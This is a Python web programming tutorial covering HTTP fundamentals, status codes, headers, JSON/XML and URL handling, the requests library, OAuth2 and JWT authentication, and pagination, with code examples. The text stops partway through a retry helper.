Web Programming

Lesson 1 ⏱ 90 min

Complete Web Programming Course

APIs, Web Communication, Client-Server, Security, and Web Scraping with Python

Contents

Part I: Web Fundamentals
1. Architecture of the World Wide Web
2. The HTTP Protocol in Detail
3. The Client-Server Model
4. Data Formats: JSON, XML, HTML
5. URLs, URIs, and Data Encoding

Part II: Consuming APIs (Client)
6. The requests Library: A Complete HTTP Client
7. API Authentication (API Keys, OAuth2, JWT)
8. Pagination, Rate Limiting, and Retry
9. WebSockets and Real-Time Communication
10. GraphQL: Flexible Queries

Part III: Building APIs (Server)
11. Introduction to Python Web Frameworks
12. Flask: From Hello World to a Complete API
13. FastAPI: Modern APIs with Typing and Validation
14. REST: Design Principles
15. Data Models, Validation, and Serialization
16. Databases and ORMs in Web Applications
17. Background Tasks, Queues, and Asynchronous Processing

Part IV: Web Scraping
18. Web Scraping Fundamentals: HTML Parsing
19. BeautifulSoup: Extracting Data from HTML
20. Advanced Scraping: Selenium and Playwright
21. Scrapy: A Framework for Scraping at Scale
22. Ethics, Legality, and Best Practices

Part V: Web Security
23. OWASP Top 10: Critical Vulnerabilities
24. Authentication and Authorization
25. CORS, CSRF, CSP, and Security Headers
26. HTTPS, TLS, and Encrypting Communications
27. Rate Limiting, Input Validation, and Sanitization

Part VI: Advanced Architectures and Patterns
28. Microservices and Inter-Service Communication
29. API Gateway and Service Mesh
30. Web-Level Caching (Redis, CDN, HTTP Cache)
31. Testing Web Applications
32. Deployment and Production

PART I: WEB FUNDAMENTALS

1. Architecture of the World Wide Web

1.1 How the Web Works

What happens when you type https://www.example.com into the browser:

1. DNS Resolution
   Browser → DNS Resolver → "What is the IP address for www.example.com?"
   Answer: 93.184.216.34

2. TCP Connection (Three-Way Handshake)
   Browser ←→ Server: SYN → SYN-ACK → ACK
   TCP connection established on port 443 (HTTPS)

3. TLS Handshake
   Browser ←→ Server: cipher negotiation, certificate verification
   Encrypted channel established

4. HTTP Request
   Browser → Server:
   GET / HTTP/1.1
   Host: www.example.com
   Accept: text/html

5. Server Processing
   Server receives the request → processes it (routing, logic, DB) → generates a response

6. HTTP Response
   Server → Browser:
   HTTP/1.1 200 OK
   Content-Type: text/html
   <html>...</html>

7. Browser Rendering
   Parses HTML and builds the DOM → downloads CSS, JS, images → renders the page

Typical total time: 100-500 ms (depends on location, server, and page complexity)
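
Steps 4 and 6 can be made concrete with a small sketch that builds the raw text of a request and splits a raw response into its parts. The helper names build_get_request and parse_response are hypothetical, and the parsing is deliberately simplified (no chunked encoding, no repeated headers), so treat it as an illustration of the wire format rather than a usable HTTP client.

```python
def build_get_request(host: str, path: str = "/") -> bytes:
    """Build the bytes of a minimal HTTP/1.1 GET request."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        "Accept: text/html",
        "Connection: close",
        "",  # the empty strings produce the blank line that ends the headers
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def parse_response(raw: bytes) -> tuple[int, dict[str, str], bytes]:
    """Split a raw HTTP response into (status code, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    _version, code, *_reason = status_line.split(" ")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(code), headers, body


raw_response = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html>...</html>"
)
status, headers, body = parse_response(raw_response)
print(build_get_request("www.example.com").decode("ascii"))
print(status, headers["content-type"], body)
```

In practice a library such as requests handles all of this, plus DNS, TCP, and TLS.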

1.2 Components of the Web Ecosystem

┌──────────────────────────────────────────────────────────────┐
│                      FRONTEND (Client)                       │
│  Browser: Chrome, Firefox, Safari, Edge                      │
│  Technologies: HTML, CSS, JavaScript, TypeScript             │
│  Frameworks: React, Vue, Angular, Svelte                     │
│  Mobile: React Native, Flutter, Swift, Kotlin                │
├──────────────────────────────────────────────────────────────┤
│                  COMMUNICATION (Transport)                   │
│  HTTP/1.1, HTTP/2, HTTP/3 (QUIC)                             │
│  WebSocket (bidirectional, persistent)                       │
│  gRPC (Protocol Buffers, binary, efficient)                  │
│  Server-Sent Events (SSE: one-way, server→client)            │
├──────────────────────────────────────────────────────────────┤
│                       BACKEND (Server)                       │
│  Python: Flask, FastAPI, Django                              │
│  Node.js: Express, Fastify, NestJS                           │
│  Go: Gin, Echo, Fiber                                        │
│  Java: Spring Boot                                           │
│  Rust: Actix-web, Axum                                       │
├──────────────────────────────────────────────────────────────┤
│                      DATA (Persistence)                      │
│  SQL: PostgreSQL, MySQL, SQLite                              │
│  NoSQL: MongoDB, Redis, DynamoDB                             │
│  Search: Elasticsearch                                       │
│  Cache: Redis, Memcached                                     │
│  Queue: RabbitMQ, Kafka, SQS                                 │
└──────────────────────────────────────────────────────────────┘

2. The HTTP Protocol in Detail

2.1 Structure of an HTTP Request

POST /api/users HTTP/1.1                    ← Request line (method, path, version)
Host: api.example.com                       ← Required header
Content-Type: application/json              ← Type of the data being sent
Authorization: Bearer eyJhbGciOi...         ← Authentication token
Accept: application/json                    ← Format accepted in the response
User-Agent: python-requests/2.31.0          ← Client making the request
Content-Length: 42                          ← Size of the body in bytes
                                            ← Blank line (header/body separator)
{"name": "Ana Pop", "email": "ana@ex.com"}  ← Body

2.2 Structure of an HTTP Response

HTTP/1.1 201 Created                        ← Status line (version, status code, reason)
Content-Type: application/json              ← Type of the data returned
Location: /api/users/42                     ← URI of the created resource
X-Request-Id: abc-123-def                   ← Custom header (tracing)
Set-Cookie: session=xyz; HttpOnly; Secure   ← Cookie
Cache-Control: no-cache                     ← Caching directives
                                            ← Blank line
{"id": 42, "name": "Ana Pop", ...}          ← Body

2.3 HTTP Methods

Method    Purpose               Idempotent  Safe  Body    Typical use
────────────────────────────────────────────────────────────────────────────
GET       Read a resource       Yes         Yes   No*     Fetching data
POST      Create a resource     No          No    Yes     Creation, actions
PUT       Full replacement      Yes         No    Yes     Full update
PATCH     Partial modification  No**        No    Yes     Partial update
DELETE    Delete a resource     Yes         No    No*     Deletion
HEAD      Like GET, no body     Yes         Yes   No      Existence check
OPTIONS   Server capabilities   Yes         Yes   No      CORS preflight

Idempotent = repeating the same call leaves the server in the same state as making it once
Safe = does not modify server state
* A body is technically allowed, but unconventional
** Can be implemented idempotently
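
The difference between an idempotent and a non-idempotent method is easiest to see on a toy in-memory store. The sketch below is not a real server; post_user and put_user are hypothetical stand-ins for POST and PUT handlers.

```python
import itertools

store: dict[int, dict] = {}
_ids = itertools.count(1)


def post_user(data: dict) -> int:
    """POST-like: every call creates a new resource under a fresh ID."""
    user_id = next(_ids)
    store[user_id] = dict(data)
    return user_id


def put_user(user_id: int, data: dict) -> None:
    """PUT-like: replaces whatever is stored at a known ID."""
    store[user_id] = dict(data)


post_user({"name": "Ana"})
post_user({"name": "Ana"})           # repeating the POST adds a second resource
count_after_posts = len(store)

put_user(1, {"name": "Ana Pop"})
put_user(1, {"name": "Ana Pop"})     # repeating the PUT changes nothing further
count_after_puts = len(store)

print(count_after_posts, count_after_puts, store[1])
```

This is why a client can safely retry a PUT after a timeout, while a retried POST may create a duplicate.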

2.4 HTTP Status Codes

1xx: Informational (rarely seen directly):
  100 Continue                The server accepts the request headers; send the rest
  101 Switching Protocols     Upgrade to WebSocket

2xx: Success:
  200 OK                      Request succeeded (GET, PUT, PATCH, DELETE)
  201 Created                 Resource created (POST); include a Location header
  204 No Content              Success with no body (DELETE, PUT)
  206 Partial Content         Partial response (download with Range)

3xx: Redirection:
  301 Moved Permanently       Resource moved permanently (search engines update their index)
  302 Found                   Temporary redirect
  304 Not Modified            Cache is valid; the body is not resent
  307 Temporary Redirect      Like 302, but preserves the HTTP method
  308 Permanent Redirect      Like 301, but preserves the HTTP method

4xx: Client error:
  400 Bad Request             Malformed request, failed validation
  401 Unauthorized            Authentication required (missing or invalid)
  403 Forbidden               Authenticated but NOT authorized
  404 Not Found               The resource does not exist
  405 Method Not Allowed      The HTTP method is not supported on this route
  409 Conflict                Conflict (e.g. duplicate, stale version)
  413 Payload Too Large       The body exceeds the size limit
  415 Unsupported Media Type  Content-Type not accepted
  422 Unprocessable Entity    Semantic validation failed (well-formed, invalid data)
  429 Too Many Requests       Rate limit exceeded; include a Retry-After header

5xx: Server error:
  500 Internal Server Error   Unexpected error on the server (bug, crash)
  502 Bad Gateway             Proxy/LB cannot reach the backend or got an invalid response
  503 Service Unavailable     Server overloaded or under maintenance
  504 Gateway Timeout         The backend did not respond in time
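
Client code often needs to turn a numeric status into one of the five classes above and decide whether a retry makes sense. A minimal sketch using the standard library's http.HTTPStatus follows; describe_status and is_retryable are hypothetical helpers, and the retry set is a common heuristic rather than a rule from the HTTP specification.

```python
from http import HTTPStatus

STATUS_CLASSES = {
    1: "informational",
    2: "success",
    3: "redirection",
    4: "client error",
    5: "server error",
}


def describe_status(code: int) -> str:
    """Return '<class>: <reason phrase>' for an HTTP status code."""
    family = STATUS_CLASSES.get(code // 100, "unknown")
    try:
        phrase = HTTPStatus(code).phrase
    except ValueError:  # the code is not registered in http.HTTPStatus
        phrase = "Unregistered"
    return f"{family}: {phrase}"


def is_retryable(code: int) -> bool:
    """Heuristic: rate limiting and transient gateway or availability failures."""
    return code in {429, 502, 503, 504}


for code in (201, 404, 503):
    print(code, describe_status(code), is_retryable(code))
```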

2.5 Important HTTP Headers

# Request headers:
headers = {
    "Host": "api.example.com",            # Domain (required in HTTP/1.1)
    "Authorization": "Bearer eyJ...",      # Authentication
    "Content-Type": "application/json",    # Type of the body being SENT
    "Accept": "application/json",          # What we ACCEPT in the response
    "Accept-Language": "ro,en;q=0.9",      # Preferred language
    "Accept-Encoding": "gzip, deflate",    # Accepted compression
    "User-Agent": "MyApp/1.0",            # Client identification
    "If-None-Match": '"abc123"',           # Conditional GET (ETag)
    "If-Modified-Since": "Mon, 01 Jan...", # Conditional GET (date)
    "Cache-Control": "no-cache",           # Cache directives
    "Cookie": "session=xyz",               # Cookies
    "X-Request-ID": "uuid-trace-id",       # Distributed tracing
}

# Response headers:
# Content-Type: application/json; charset=utf-8
# Content-Length: 1234
# Cache-Control: public, max-age=3600     # Cache for 1 hour
# ETag: "abc123"                           # Resource version (cache validation)
# Last-Modified: Mon, 01 Jan 2024 ...     # Last modification time
# Set-Cookie: session=xyz; HttpOnly; Secure; SameSite=Lax
# X-RateLimit-Limit: 100                  # Limit per window
# X-RateLimit-Remaining: 73               # Requests remaining
# X-RateLimit-Reset: 1704067200           # Reset timestamp
# Location: /api/users/42                  # URI of the created resource (201)
# Retry-After: 60                          # Seconds to wait (429/503)

# Security headers:
# Strict-Transport-Security: max-age=31536000; includeSubDomains
# X-Content-Type-Options: nosniff
# X-Frame-Options: DENY
# Content-Security-Policy: default-src 'self'
# X-XSS-Protection: 0  (deprecated; CSP is the better defense)
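
The ETag and If-None-Match pair listed above drives conditional GET: the server answers 304 Not Modified with an empty body when the client's cached version is still current. The sketch below shows the server-side decision only. make_etag and conditional_get are hypothetical helpers, deriving the ETag from a SHA-256 of the body is one possible choice, and real servers also have to handle lists of ETags and the `*` wildcard.

```python
import hashlib


def make_etag(body: bytes) -> str:
    """Derive an ETag from the body; HTTP requires the surrounding quotes."""
    return '"' + hashlib.sha256(body).hexdigest()[:16] + '"'


def conditional_get(
    body: bytes, request_headers: dict[str, str]
) -> tuple[int, dict[str, str], bytes]:
    """Return (status, headers, body), honoring a single If-None-Match value."""
    etag = make_etag(body)
    headers = {"ETag": etag, "Cache-Control": "public, max-age=3600"}
    if request_headers.get("If-None-Match") == etag:
        return 304, headers, b""  # the cached copy is still valid
    return 200, headers, body


resource = b'{"id": 42, "name": "Ana Pop"}'
first = conditional_get(resource, {})
cached_etag = first[1]["ETag"]

# Same content: the server can skip the body.
second = conditional_get(resource, {"If-None-Match": cached_etag})

# Content changed: the old ETag no longer matches, so the full body is sent.
third = conditional_get(b'{"id": 42, "name": "Ana P."}', {"If-None-Match": cached_etag})

print(first[0], second[0], third[0])
```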

2.6 HTTP/2 and HTTP/3

HTTP/1.1:
  - One request/response at a time per connection (pipelining exists but is rarely used)
  - Head-of-line blocking (the second request waits for the first)
  - Text headers, uncompressed and repetitive
  - Workaround: multiple TCP connections (6-8 per domain)

HTTP/2:
  - Multiplexing: multiple requests IN PARALLEL over a single TCP connection
  - Header compression (HPACK): dramatically reduces header size
  - Server Push: the server sends resources BEFORE the client asks for them (since deprecated and disabled in major browsers)
  - Stream prioritization: important resources are delivered first
  - Binary framing: more efficient than text

HTTP/3 (QUIC):
  - Based on UDP (not TCP) → removes head-of-line blocking at the transport level
  - Faster handshake (0-RTT or 1-RTT vs. 2-3 RTT for TCP + TLS, depending on the TLS version)
  - Connection migration (switch networks and the connection persists)
  - Better performance on unstable networks (mobile, Wi-Fi)

3. The Client-Server Model

3.1 The Traditional Architecture

┌──────────┐         HTTP Request          ┌──────────┐
│  CLIENT  │ ────────────────────────────► │  SERVER  │
│          │                               │          │
│ Browser  │ ◄──────────────────────────── │ Flask /  │
│ Mobile   │         HTTP Response         │ FastAPI  │
│ Script   │                               │ Django   │
│ CLI      │                               │          │
└──────────┘                               └────┬─────┘
                                                │
                                           ┌────▼─────┐
                                           │ DATABASE │
                                           └──────────┘

Communication models:
  Request-Response (synchronous): the client sends, the server responds, the client waits
  Pub-Sub (asynchronous): the client subscribes, the server publishes messages
  Push (server-initiated): the server sends data without a request (WebSocket, SSE)
  Polling: the client periodically asks whether new data is available (inefficient)
  Long Polling: the client asks, and the server holds the connection open until it has data
3.2 API (Application Programming Interface)

The API defines the CONTRACT between client and server:
  - Which endpoints are available (URLs)
  - Which HTTP methods each one accepts
  - Which parameters it takes (query, path, body)
  - What format the data uses (JSON, XML)
  - Which responses it returns (status codes, data structure)
  - How the client authenticates

Types of web APIs:
  REST (Representational State Transfer): the most common, resource-based
  GraphQL: the client specifies exactly which data it wants
  gRPC: Protocol Buffers, binary, efficient, typed
  SOAP: XML, enterprise legacy, complex
  WebSocket: bidirectional, persistent, real-time

4. Data Formats: JSON, XML, HTML

4.1 JSON (JavaScript Object Notation)

import json

# JSON: the dominant format for web APIs
data = {
    "id": 42,
    "name": "Ana Pop",
    "email": "ana@example.com",
    "age": 21,
    "active": True,          # Python True → JSON true
    "address": None,         # Python None → JSON null
    "courses": [
        {"name": "Algebra", "grade": 9.5},
        {"name": "Programming", "grade": 10.0}
    ],
    "tags": ["student", "scholarship"]
}

# Serialization (Python dict → JSON string):
json_string = json.dumps(data, indent=2, ensure_ascii=False)
print(json_string)

# Deserialization (JSON string → Python dict):
parsed = json.loads(json_string)
print(parsed["courses"][0]["name"])    # "Algebra"

# Writing/reading a JSON file:
with open("data.json", "w", encoding="utf-8") as f:
    json.dump(data, f, indent=2, ensure_ascii=False)

with open("data.json", "r", encoding="utf-8") as f:   # read with the encoding used for writing
    loaded = json.load(f)

# JSON ↔ Python types:
# JSON object  {}     ↔  Python dict
# JSON array   []     ↔  Python list
# JSON string  ""     ↔  Python str
# JSON number  42/3.14 ↔ Python int/float
# JSON boolean true/false ↔ Python True/False
# JSON null           ↔  Python None
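
The type table covers only JSON's native types; values such as dates, Decimal, or sets make json.dumps raise TypeError. One common approach, sketched here, is to pass a fallback through the `default` parameter. The function to_jsonable and the sample record are illustrative assumptions, and the chosen encodings (ISO 8601 strings, Decimal as string) are conventions the receiving side has to know about.

```python
import json
from datetime import date, datetime
from decimal import Decimal


def to_jsonable(obj):
    """Fallback for values json.dumps cannot serialize natively."""
    if isinstance(obj, (datetime, date)):
        return obj.isoformat()
    if isinstance(obj, Decimal):
        return str(obj)          # a string avoids float rounding
    if isinstance(obj, set):
        return sorted(obj)       # sets have no order; sort for stable output
    raise TypeError(f"Cannot serialize {type(obj).__name__}")


record = {
    "name": "Ana Pop",
    "enrolled": date(2024, 10, 1),
    "fee": Decimal("1250.50"),
    "tags": {"student", "scholarship"},
}

encoded = json.dumps(record, default=to_jsonable, ensure_ascii=False)
decoded = json.loads(encoded)
print(decoded)
```

Note that the round trip is lossy: decoded["enrolled"] comes back as a plain string, not a date.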

4.2 XML

import xml.etree.ElementTree as ET

# XML: a more verbose format, used in SOAP, RSS, and configuration files
xml_string = """<?xml version="1.0" encoding="UTF-8"?>
<student id="42">
    <name>Ana Pop</name>
    <email>ana@example.com</email>
    <courses>
        <course grade="9.5">Algebra</course>
        <course grade="10.0">Programming</course>
    </courses>
</student>"""

root = ET.fromstring(xml_string)
print(root.attrib["id"])                    # "42"
print(root.find("name").text)               # "Ana Pop"

for course in root.findall(".//course"):
    print(f"{course.text}: {course.attrib['grade']}")
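
When an API returns XML but the rest of the application works with dicts, a small conversion function keeps the parsing in one place. The sketch below reuses the student document from above; student_to_dict is a hypothetical helper tied to that specific layout, not a general XML-to-dict converter.

```python
import xml.etree.ElementTree as ET

xml_string = """<student id="42">
    <name>Ana Pop</name>
    <email>ana@example.com</email>
    <courses>
        <course grade="9.5">Algebra</course>
        <course grade="10.0">Programming</course>
    </courses>
</student>"""


def student_to_dict(xml_text: str) -> dict:
    """Convert the <student> document into a plain dict with typed values."""
    root = ET.fromstring(xml_text)
    return {
        "id": int(root.attrib["id"]),          # attributes are always strings
        "name": root.findtext("name"),
        "email": root.findtext("email"),
        "courses": [
            {"name": course.text, "grade": float(course.attrib["grade"])}
            for course in root.findall("./courses/course")
        ],
    }


student = student_to_dict(xml_string)
print(student)
```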

5. URLs, URIs, and Data Encoding

from urllib.parse import urlparse, urlencode, quote, parse_qs

# Anatomy of a URL:
# https://api.example.com:8443/v2/users?status=active&page=2#results
# └─┬─┘   └──────┬──────┘ └┬─┘└───┬───┘ └─────────┬────────┘ └──┬──┘
# scheme       host       port   path       query string     fragment

url = "https://api.example.com:8443/v2/users?status=active&page=2#results"
parsed = urlparse(url)
print(parsed.scheme)     # "https"
print(parsed.hostname)   # "api.example.com"
print(parsed.port)       # 8443
print(parsed.path)       # "/v2/users"
print(parsed.query)      # "status=active&page=2"
print(parsed.fragment)   # "results"

# Parsing the query string:
params = parse_qs(parsed.query)
print(params)            # {'status': ['active'], 'page': ['2']}

# URL encoding (special characters):
print(quote("Ana Pop & Marin"))          # "Ana%20Pop%20%26%20Marin"
print(urlencode({"q": "Python & web", "page": 1}))  # "q=Python+%26+web&page=1"

# Safe URL construction:
from urllib.parse import urljoin
# The trailing slash on base matters: without it, urljoin replaces the last path segment ("v2")
base = "https://api.example.com/v2/"
print(urljoin(base, "users/42"))         # "https://api.example.com/v2/users/42"
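
The pieces above (quote for path segments, urlencode for the query string) can be combined into a single helper so that user-supplied values never break the URL structure. This is a sketch under assumptions: build_url is a hypothetical function, and it escapes every character in a path segment, including `/`, which is stricter than some APIs expect.

```python
from urllib.parse import quote, urlencode, urlsplit, urlunsplit


def build_url(base: str, *segments: str, **query) -> str:
    """Append escaped path segments and query parameters to a base URL."""
    scheme, netloc, path, _, _ = urlsplit(base)
    parts = [path.rstrip("/")] + [quote(str(s), safe="") for s in segments]
    return urlunsplit((scheme, netloc, "/".join(parts), urlencode(query), ""))


url = build_url(
    "https://api.example.com/v2/",
    "users",
    "ana pop/admin",            # the slash is escaped, so this stays one segment
    status="active",
    q="Python & web",
)
print(url)
```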

PART II: CONSUMING APIs (CLIENT)

6. The `requests` Library: A Complete HTTP Client

6.1 Basic Operations

import requests

# === GET: reading data ===
response = requests.get("https://jsonplaceholder.typicode.com/posts/1")

print(response.status_code)      # 200
print(response.headers["Content-Type"])  # "application/json; charset=utf-8"
print(response.json())           # Python dict (automatic deserialization)
print(response.text)             # raw string
print(response.elapsed)          # timedelta (request duration)
print(response.url)              # final URL (after redirects)

# GET with query parameters:
params = {"userId": 1, "completed": "true"}
response = requests.get(
    "https://jsonplaceholder.typicode.com/todos",
    params=params    # → ?userId=1&completed=true
)
todos = response.json()
print(f"Found {len(todos)} completed todos")

# === POST: creating a resource ===
new_post = {
    "title": "My Post",
    "body": "Content here",
    "userId": 1
}
response = requests.post(
    "https://jsonplaceholder.typicode.com/posts",
    json=new_post    # Automatic serialization + Content-Type: application/json
)
print(response.status_code)    # 201 Created
print(response.json()["id"])   # ID of the created resource

# === PUT: full replacement ===
updated = {"id": 1, "title": "Updated Title", "body": "New body", "userId": 1}
response = requests.put(
    "https://jsonplaceholder.typicode.com/posts/1",
    json=updated
)

# === PATCH: partial modification ===
partial = {"title": "Only Title Changed"}
response = requests.patch(
    "https://jsonplaceholder.typicode.com/posts/1",
    json=partial
)

# === DELETE: deletion ===
response = requests.delete("https://jsonplaceholder.typicode.com/posts/1")
print(response.status_code)    # 200 (or 204 No Content)

6.2 Headers, Timeouts, Sessions

# Custom headers:
headers = {
    "Authorization": "Bearer my-token-here",
    "Accept": "application/json",
    "X-Custom-Header": "value"
}
response = requests.get("https://api.example.com/data", headers=headers)

# Timeout (ALWAYS set a timeout in production!):
try:
    response = requests.get(
        "https://api.example.com/slow-endpoint",
        timeout=(3.05, 27)   # (connect_timeout, read_timeout) in seconds
    )
except requests.Timeout:
    print("Request timed out!")
except requests.ConnectionError:
    print("Could not connect to the server!")
except requests.RequestException as e:
    print(f"Request error: {e}")

# Sessions (reuse the TCP connection, persist cookies):
session = requests.Session()
session.headers.update({"Authorization": "Bearer token123"})
session.verify = True    # Verify the TLS certificate (default True)

# Every request made through the session carries the Authorization header:
r1 = session.get("https://api.example.com/users")
r2 = session.get("https://api.example.com/posts")
session.close()

# Or with a context manager:
with requests.Session() as s:
    s.headers["Authorization"] = "Bearer token123"
    users = s.get("https://api.example.com/users").json()

# File upload (the with block closes the file once the request is done):
with open("document.pdf", "rb") as f:
    files = {"file": ("document.pdf", f, "application/pdf")}
    response = requests.post("https://api.example.com/upload", files=files)

# Sending form data (not JSON):
data = {"username": "ana", "password": "secret"}
response = requests.post("https://example.com/login", data=data)
# Content-Type: application/x-www-form-urlencoded (set automatically)

# Checking the response (raise on errors):
response = requests.get("https://api.example.com/data")
response.raise_for_status()   # Raises HTTPError if status >= 400

6.3 Handling Responses

# Requires Python 3.10+ (match statement)
def fetch_user(user_id: int) -> dict | None:
    """Robust example of consuming an API."""
    url = f"https://api.example.com/users/{user_id}"

    try:
        response = requests.get(url, timeout=10)

        match response.status_code:
            case 200:
                return response.json()
            case 404:
                print(f"User {user_id} not found")
                return None
            case 401:
                raise PermissionError("Authentication failed")
            case 429:
                # Assumes Retry-After is given in seconds, not as an HTTP date
                retry_after = int(response.headers.get("Retry-After", 60))
                print(f"Rate limited. Retry after {retry_after}s")
                return None
            case status if 500 <= status < 600:
                print(f"Server error: {status}")
                return None
            case _:
                response.raise_for_status()   # raises HTTPError for any other 4xx

    except requests.Timeout:
        print("Request timeout")
    except requests.ConnectionError:
        print("Connection failed")
    except requests.JSONDecodeError:
        print("Invalid JSON in response")

    return None

7. API Authentication

7.1 API Key

# Method 1: in a header
headers = {"X-API-Key": "your-api-key-here"}
response = requests.get("https://api.example.com/data", headers=headers)

# Method 2: in a query parameter (less secure: the key ends up in logs)
params = {"api_key": "your-api-key-here"}
response = requests.get("https://api.example.com/data", params=params)

7.2 OAuth2: The Complete Flow

# OAuth2 Authorization Code Flow (for web applications with a backend):
import requests
from urllib.parse import urlencode

# Step 1: Redirect the user to the provider (Google, GitHub, etc.)
# urlencode escapes the redirect URI and the spaces in scope
auth_url = "https://accounts.google.com/o/oauth2/v2/auth?" + urlencode({
    "client_id": "YOUR_CLIENT_ID",
    "redirect_uri": "http://localhost:8000/callback",
    "response_type": "code",
    "scope": "openid email profile",
    "state": "random-csrf-token",   # must be unpredictable and verified in the callback
})
# The user authenticates and grants access → redirected to the callback with ?code=XXX

# Step 2: Exchange the code for a token (server-side)
token_response = requests.post(
    "https://oauth2.googleapis.com/token",
    data={
        "grant_type": "authorization_code",
        "code": "AUTHORIZATION_CODE_FROM_CALLBACK",
        "redirect_uri": "http://localhost:8000/callback",
        "client_id": "YOUR_CLIENT_ID",
        "client_secret": "YOUR_CLIENT_SECRET",
    },
    timeout=10,
)
tokens = token_response.json()
access_token = tokens["access_token"]
refresh_token = tokens.get("refresh_token")

# Step 3: Use the access token
headers = {"Authorization": f"Bearer {access_token}"}
user_info = requests.get(
    "https://www.googleapis.com/oauth2/v3/userinfo",
    headers=headers,
    timeout=10,
).json()
print(f"Welcome, {user_info['name']}!")

# Step 4: Refresh the token (when the access token expires)
refresh_response = requests.post(
    "https://oauth2.googleapis.com/token",
    data={
        "grant_type": "refresh_token",
        "refresh_token": refresh_token,
        "client_id": "YOUR_CLIENT_ID",
        "client_secret": "YOUR_CLIENT_SECRET",
    },
    timeout=10,
)
new_access_token = refresh_response.json()["access_token"]
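
The state parameter in step 1 only protects against CSRF if it is random per login attempt and checked when the provider redirects back. A minimal sketch of that pair of operations follows. build_authorization_url and state_matches are hypothetical helpers, and storing the state in the user's server-side session is assumed but not shown.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit


def build_authorization_url(client_id: str, redirect_uri: str) -> tuple[str, str]:
    """Return (authorization URL, state). The caller must store state in the session."""
    state = secrets.token_urlsafe(32)   # unpredictable, URL-safe random value
    query = urlencode({
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        "response_type": "code",
        "scope": "openid email profile",
        "state": state,
    })
    return f"https://accounts.google.com/o/oauth2/v2/auth?{query}", state


def state_matches(expected: str, received: str) -> bool:
    """Compare the stored and returned state values in constant time."""
    return hmac.compare_digest(expected.encode(), received.encode())


auth_url, saved_state = build_authorization_url(
    "YOUR_CLIENT_ID", "http://localhost:8000/callback"
)

# Simulate the provider echoing the state back on the callback URL.
returned_state = parse_qs(urlsplit(auth_url).query)["state"][0]
print(state_matches(saved_state, returned_state))
print(state_matches(saved_state, "forged-value"))
```

If the check fails, the callback should reject the request before exchanging the code for a token.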

7.3 JWT (JSON Web Token)

import jwt  # pip install PyJWT
import requests
from datetime import datetime, timedelta, timezone

SECRET_KEY = "your-secret-key-min-256-bits"   # placeholder; load the real key from configuration

# Creating a JWT:
now = datetime.now(timezone.utc)   # timezone-aware; datetime.utcnow() is deprecated since Python 3.12
payload = {
    "sub": "user-42",                                    # Subject (user ID)
    "name": "Ana Pop",
    "role": "admin",
    "iat": now,                                          # Issued At
    "exp": now + timedelta(hours=1),                     # Expiration
    "iss": "myapp.example.com",                          # Issuer
}
token = jwt.encode(payload, SECRET_KEY, algorithm="HS256")
print(token)
# eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJ1c2...

# JWT structure: HEADER.PAYLOAD.SIGNATURE
# Header:    {"alg": "HS256", "typ": "JWT"}  (base64url)
# Payload:   {"sub": "user-42", ...}          (base64url)
# Signature: HMAC-SHA256(header.payload, secret)

# Verifying and decoding a JWT:
try:
    decoded = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
    print(decoded["sub"])    # "user-42"
    print(decoded["role"])   # "admin"
except jwt.ExpiredSignatureError:
    print("Token expired!")
except jwt.InvalidTokenError:
    print("Invalid token!")

# Using it in requests:
headers = {"Authorization": f"Bearer {token}"}
response = requests.get("https://api.example.com/protected", headers=headers)
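
To see what the HEADER.PAYLOAD.SIGNATURE structure means in practice, the HS256 case can be reproduced with the standard library alone. This is an educational sketch, not a replacement for PyJWT: sign_hs256 and verify_hs256 are hypothetical helpers, and the verifier checks only the signature, not exp, iss, or the alg header.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Decode base64url, restoring the padding that JWT strips."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: bytes) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode("utf-8"))
        for part in (header, payload)
    )
    signature = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(signature)}"


def verify_hs256(token: str, secret: bytes) -> dict:
    """Return the payload if the signature is valid, else raise ValueError."""
    signing_input, _, signature = token.rpartition(".")
    expected = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(signature)):
        raise ValueError("invalid signature")
    return json.loads(b64url_decode(signing_input.split(".")[1]))


secret = b"demo-secret-for-illustration-only"
token = sign_hs256({"sub": "user-42", "role": "admin"}, secret)
claims = verify_hs256(token, secret)
print(token)
print(claims)
```

The payload is only encoded, not encrypted: anyone holding the token can read the claims, and the signature merely prevents them from being changed undetected.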

8. Pagination, Rate Limiting, and Retry

import time
import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

# === Cursor-based pagination (recommended) ===
def fetch_all_items(base_url: str, api_key: str) -> list[dict]:
    """Iterate through all pages of an API by following its "next" links."""
    items = []
    url = f"{base_url}/items"
    params = {"limit": 100}

    while url:
        response = requests.get(
            url, headers={"X-API-Key": api_key}, params=params, timeout=10
        )
        response.raise_for_status()
        data = response.json()

        items.extend(data["results"])
        url = data.get("next")     # URL of the next page (or None)
        params = {}                 # Parameters are already part of the next URL

        print(f"Fetched {len(items)} / {data.get('total', '?')} items")

    return items

# === Offset-based pagination ===
def fetch_paginated(base_url: str, per_page: int = 50) -> list[dict]:
    items = []
    page = 1

    while True:
        response = requests.get(
            f"{base_url}/items",
            params={"page": page, "per_page": per_page},
            timeout=10
        )
        response.raise_for_status()   # stop on HTTP errors instead of parsing an error body
        data = response.json()
        if not data["results"]:
            break
        items.extend(data["results"])
        page += 1

    return items

# === Automatic retry with exponential backoff ===
def create_resilient_session() -> requests.Session:
    """Create an HTTP session with automatic retries."""
    session = requests.Session()

    retry_strategy = Retry(
